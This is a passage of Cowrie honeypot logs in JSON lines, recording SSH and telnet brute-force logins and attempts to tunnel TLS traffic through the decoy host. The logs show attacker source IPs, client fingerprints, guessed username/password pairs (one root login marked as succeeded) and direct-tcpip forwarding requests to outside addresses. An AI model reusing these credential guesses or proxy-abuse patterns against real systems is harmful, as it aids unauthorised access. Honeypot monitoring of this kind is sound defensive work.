\\xc8\\x0c\\xd6\\xde+\\xc3J\\x06\\x00E?\\x92\\xd19\\xa5\\xb2\\xfd\\x9dd+\\xe1\\x0ce?\\xd7b\\x95\\xed\\x80\\x89\\xf0\\xc4\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 $au\\x83\\x9e`JW\\x8e\\x1bm\\x80\\xd6\\xbb\\xbe\\x8d\\xb9+\\x87\\xaf\\xa2\\xb8%\\xe5\\xf6\\xd7\\xfa\\xbe\\xe1\\x82]\\x17\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T01:44:00.514255Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"172.217.19.100","dst_port":443,"src_ip":"212.227.125.160","src_port":49058,"message":"direct-tcp connection request to 172.217.19.100:443 from 127.0.0.1:49058","sensor":"my-vps","timestamp":"2025-08-31T01:44:01.577690Z","session":"7fe55b14eb0c"}
{"eventid":"cowrie.session.closed","duration":12.707999467849731,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:03.701360Z","src_ip":"212.227.125.160","session":"973f1843aca1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43461,"dst_ip":"1.2.3.4","dst_port":23,"session":"91d19b6d30f3","protocol":"telnet","message":"New connection: 212.227.125.160:43461 (1.2.3.4:23) [session: 91d19b6d30f3]","sensor":"my-vps","timestamp":"2025-08-31T01:44:03.909387Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"172.217.19.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x9dZ\\xca\\x91\\xc5\\xa2\\xf2[=j\\x8f\\xaclua\\x9f\\x84W\\xb8\\xc8PI\\xe0\\x0f\\x1b\\xf4\\x86\\x11\\xe6p{\\x8d 6\\xfe\\xbb\\x08\\xc9\\x06#_\\x86\\xc6\\xf8\\xf5=\\x14\\xb8!\\xcb?U\\xe9v\\xac\\xa0\\x18\\\\\\xcf\\xfa\\x1c\\xde\\xfb$5\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc1\\xd2\\x87\\x8d\\xcd\\xfb:\\r\\x85w\\xcd|\\xda@\\x83B\\x98\\xe2\\x1f\\xc2\\xe4w\\x9e\\x88\\xbc\\x1d\\x83\\x12\\x1a\\x88'J\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 172.217.19.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x9dZ\\xca\\x91\\xc5\\xa2\\xf2[=j\\x8f\\xaclua\\x9f\\x84W\\xb8\\xc8PI\\xe0\\x0f\\x1b\\xf4\\x86\\x11\\xe6p{\\x8d 6\\xfe\\xbb\\x08\\xc9\\x06#_\\x86\\xc6\\xf8\\xf5=\\x14\\xb8!\\xcb?U\\xe9v\\xac\\xa0\\x18\\\\\\xcf\\xfa\\x1c\\xde\\xfb$5\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc1\\xd2\\x87\\x8d\\xcd\\xfb:\\r\\x85w\\xcd|\\xda@\\x83B\\x98\\xe2\\x1f\\xc2\\xe4w\\x9e\\x88\\xbc\\x1d\\x83\\x12\\x1a\\x88'J\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T01:44:05.503561Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.login.failed","username":"docker","password":"admin123","message":"login attempt [docker/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:44:06.358186Z","src_ip":"212.227.235.229","session":"ab35c09f7844"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:07.496428Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:08.144503Z","src_ip":"212.227.235.229","session":"ab35c09f7844"}
{"eventid":"cowrie.session.closed","duration":12.804987907409668,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:16.714301Z","src_ip":"212.227.125.160","session":"91d19b6d30f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43651,"dst_ip":"1.2.3.4","dst_port":23,"session":"818704818f3c","protocol":"telnet","message":"New connection: 212.227.125.160:43651 (1.2.3.4:23) [session: 818704818f3c]","sensor":"my-vps","timestamp":"2025-08-31T01:44:16.917887Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42498,"dst_ip":"1.2.3.4","dst_port":22,"session":"50d6f32cf6dd","protocol":"ssh","message":"New connection: 212.227.125.160:42498 (1.2.3.4:22) [session: 50d6f32cf6dd]","sensor":"my-vps","timestamp":"2025-08-31T01:44:21.590504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:44:22.131934Z","src_ip":"212.227.125.160","session":"50d6f32cf6dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:44:22.132807Z","src_ip":"212.227.125.160","session":"50d6f32cf6dd"}
{"eventid":"cowrie.login.failed","username":"docker","password":"admin123","message":"login attempt [docker/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:44:24.457300Z","src_ip":"212.227.125.160","session":"50d6f32cf6dd"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:26.100423Z","src_ip":"212.227.125.160","session":"50d6f32cf6dd"}
{"eventid":"cowrie.session.closed","duration":12.688010931015015,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:29.605793Z","src_ip":"212.227.125.160","session":"818704818f3c"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":44250,"dst_ip":"1.2.3.4","dst_port":22,"session":"6282dffa386d","protocol":"ssh","message":"New connection: 82.67.125.95:44250 (1.2.3.4:22) [session: 6282dffa386d]","sensor":"my-vps","timestamp":"2025-08-31T01:44:50.754958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:44:50.755998Z","src_ip":"82.67.125.95","session":"6282dffa386d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:44:50.791757Z","src_ip":"82.67.125.95","session":"6282dffa386d"}
{"eventid":"cowrie.login.failed","username":"yoyo","password":"yoyo","message":"login attempt [yoyo/yoyo] failed","sensor":"my-vps","timestamp":"2025-08-31T01:44:50.977990Z","src_ip":"82.67.125.95","session":"6282dffa386d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:44:52.016931Z","src_ip":"82.67.125.95","session":"6282dffa386d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33766,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f446125463a","protocol":"ssh","message":"New connection: 212.227.235.229:33766 (1.2.3.4:22) [session: 1f446125463a]","sensor":"my-vps","timestamp":"2025-08-31T01:45:01.646911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:45:02.403674Z","src_ip":"212.227.235.229","session":"1f446125463a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:45:02.405948Z","src_ip":"212.227.235.229","session":"1f446125463a"}
{"eventid":"cowrie.login.failed","username":"docker","password":"root123","message":"login attempt [docker/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:45:08.438426Z","src_ip":"212.227.235.229","session":"1f446125463a"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:10.419740Z","src_ip":"212.227.235.229","session":"1f446125463a"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:11.179831Z","src_ip":"115.190.94.119","session":"6867d85ac928"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37316,"dst_ip":"1.2.3.4","dst_port":22,"session":"260617f5bd80","protocol":"ssh","message":"New connection: 212.227.235.229:37316 (1.2.3.4:22) [session: 260617f5bd80]","sensor":"my-vps","timestamp":"2025-08-31T01:45:19.096240Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:19.237270Z","src_ip":"212.227.235.229","session":"260617f5bd80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57628,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4af06ce9983","protocol":"ssh","message":"New connection: 212.227.235.229:57628 (1.2.3.4:22) [session: d4af06ce9983]","sensor":"my-vps","timestamp":"2025-08-31T01:45:22.537317Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:45:22.539059Z","src_ip":"212.227.235.229","session":"d4af06ce9983"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58011,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f95e8c84ee6","protocol":"ssh","message":"New connection: 212.227.235.229:58011 (1.2.3.4:22) [session: 1f95e8c84ee6]","sensor":"my-vps","timestamp":"2025-08-31T01:45:22.636268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:45:22.637317Z","src_ip":"212.227.235.229","session":"1f95e8c84ee6"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T01:45:22.766688Z","src_ip":"212.227.235.229","session":"1f95e8c84ee6"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:45:23.156987Z","src_ip":"212.227.235.229","session":"1f95e8c84ee6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T01:45:23.287485Z","session":"1f95e8c84ee6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52848,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ff27312faec","protocol":"ssh","message":"New connection: 212.227.125.160:52848 (1.2.3.4:22) [session: 1ff27312faec]","sensor":"my-vps","timestamp":"2025-08-31T01:45:24.004319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:45:24.468418Z","src_ip":"212.227.125.160","session":"1ff27312faec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:45:24.469405Z","src_ip":"212.227.125.160","session":"1ff27312faec"}
{"eventid":"cowrie.login.failed","username":"docker","password":"root123","message":"login attempt [docker/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:45:27.009630Z","src_ip":"212.227.125.160","session":"1ff27312faec"}
